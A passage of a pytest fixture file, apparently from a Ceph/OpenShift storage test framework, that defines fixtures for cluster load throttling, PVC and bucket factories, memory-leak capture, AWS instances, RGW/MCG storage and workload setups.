try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 15 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided assess modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random'
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' :The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of same assess mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting fot the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance.key())
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Deletes all objects that were created as part of the test
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list of objects
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
*args,
**kwargs,
):
"""
Creates and deletes all buckets that were created as part of the test
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_Health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for i in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
*args,
**kwargs,
)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health()
return created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
# Creates namespace opensift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = ocp_version
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = ocp_version
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for pg_bench pod to initialized and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait jenkins deploy pod reach to completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait build reach 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def couchbase_factory_fixture(request):
"""
Couchbase factory fixture
"""
couchbase = CouchBase()
def factory(replicas=3, run_in_bg=False, skip_analyze=True, sc_name=None):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Run IOs in background as option
skip_analyze (bool): Skip logs analysis as option
"""
# Setup couchbase
couchbase.setup_cb()
# Create couchbase workers
couchbase.create_couchbase_worker(replicas=replicas, sc_name=sc_name)
# Run couchbase workload
